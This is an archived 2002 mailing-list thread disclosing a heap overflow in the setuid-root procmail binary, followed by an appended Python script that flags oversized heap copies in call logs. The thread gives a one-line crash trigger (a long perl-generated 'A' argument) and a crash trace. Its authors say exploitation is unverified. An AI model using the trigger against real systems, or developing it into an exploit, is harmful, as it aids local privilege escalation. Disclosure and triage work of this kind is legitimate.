Vulnerability Development mailing list archives

Re: procmail heap overflow


From: KF <dotslash () snosoft com>
Date: Wed, 19 Jun 2002 00:46:29 -0400

I believe we (one of our researchers "dvdman") were messing with this a few months back ... we never finished up our research ... here's what I found in an old strace log...

-KF


malloc(86)                                        = 0x0805e0c0
memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096)      = 0x0805e0c4
strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., '=') = "=a"
setregid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setreuid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setuid(506)                                       = 0
setegid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) = 0x0805c9c8
strlen(0x080577b1, 0x40192620, 0xbfffd048, 0x400de1de, 0) = 8
malloc(81)                                        = 0x0805e120
memmove(0x0805e120, 0x080577b1, 8, 0x400de1de, 0) = 0x0805e120
strlen(0x08057d68, 0x080577b1, 8, 0x400de1de, 0)  = 2
memmove(0x0805e128, 0x08057d68, 2, 0x400de1de, 0) = 0x0805e128
strlen(0x08057811, 0x08057d68, 2, 0x400de1de, 0)  = 17
memmove(0x0805e12a, 0x08057811, 17, 0x400de1de, 0) = 0x0805e12a
write(2, "procmail: Exceeded LINEBUF\n", 27)      = 27
strchr("PROCMAIL_OVERFLOW=yes", '=')              = "=yes"
strncmp("PROCMAIL_OVERFLOW=yes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 17) = 15
strncmp("PROCMAIL_OVERFLOW=yes", "EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOF"..., 17 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

-KF


SpaceWalker wrote:

$ procmail -v
procmail v3.15.1 2001/01/08
$ procmail `perl -e '{print "A"x10240}'`=A
wait indefinitely
Doesn't seem to segfault on my system, I'm running base slackware 8 on x86.

On Wed, 19 Jun 2002 02:38:08 +0200
flatline <flatline () blackhat nl> wrote:

hi,

i found a heap overflow in procmail (up until latest) some time ago.

flatline@intra:/usr/bin$ ls -la procmail
-rwsr-xr-x    1 root     mail        64344 Jun  3  2001 procmail*
flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
procmail: Exceeded LINEBUF
Segmentation fault
flatline@intra:/usr/bin$

at first it seemed to properly drop privs before segging, but not too long ago i managed to make it crash while it still had euid 0. segfaults have been seen on red hat/slackware linux and bsd variants. successful exploitation has not been verified.

/ flatline

greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone who felt left out.
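The library-call log KF posted shows the pattern a reviewer looks for when triaging a crash like this: a malloc'd block, then a bounded copy whose length (the strncpy with 10000) exceeds anything the destination block could hold. The script below is an added example, not code from this thread or from procmail; it tracks malloc() return values in such a log and flags copies that exceed the room left in the block. The malloc(1024) line for the 0x0805c9c8 buffer in the sample is an assumption, since the posted log does not show that allocation.

```python
import re

# Constructed sample in the style of the log quoted above. The malloc(86),
# memmove and strncpy lines are modelled on that log; the malloc(1024) for
# 0x0805c9c8 is an assumption so the destination buffer has a known size.
SAMPLE_LOG = """\
malloc(1024)                                      = 0x0805c9c8
malloc(86)                                        = 0x0805e0c0
memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096)      = 0x0805e0c4
strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) = 0x0805c9c8
write(2, "procmail: Exceeded LINEBUF\\n", 27)      = 27
"""

CALL_RE = re.compile(r'^(\w+)\((.*)\)\s*=\s*(\S+)')
# Quoted (possibly truncated with "...") strings or bare tokens.
ARG_RE = re.compile(r'"(?:[^"\\]|\\.)*"(?:\.\.\.)?|[^,\s]+')
# Copy-style calls: (destination-argument index, length-argument index).
COPY_CALLS = {"memmove": (0, 2), "memcpy": (0, 2), "strncpy": (0, 2)}

def find_heap_overflows(log):
    """Return [(line_no, func, dest, length, room)] for copies whose length
    exceeds the space left in the malloc'd block holding the destination.
    Only blocks whose malloc() appears in the log are known; copies into
    unknown addresses are skipped rather than reported."""
    heap = {}      # block base address -> size in bytes
    findings = []
    for no, line in enumerate(log.splitlines(), 1):
        m = CALL_RE.match(line)
        if not m:
            continue
        func, argstr, ret = m.groups()
        args = ARG_RE.findall(argstr)
        if func == "malloc":
            heap[int(ret, 16)] = int(args[0])
        elif func in COPY_CALLS:
            di, li = COPY_CALLS[func]
            dest, length = int(args[di], 16), int(args[li])
            for base, size in heap.items():
                if base <= dest < base + size:
                    room = base + size - dest
                    # strncpy pads to n, so the bound alone decides.
                    if length > room:
                        findings.append((no, func, dest, length, room))
                    break
    return findings

if __name__ == "__main__":
    for no, func, dest, length, room in find_heap_overflows(SAMPLE_LOG):
        print(f"line {no}: {func} writes {length} bytes at {dest:#010x}, "
              f"only {room} bytes left in block")
```

The memmove of 82 bytes at offset 4 into the 86-byte block fits exactly and is not reported; only the strncpy is.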
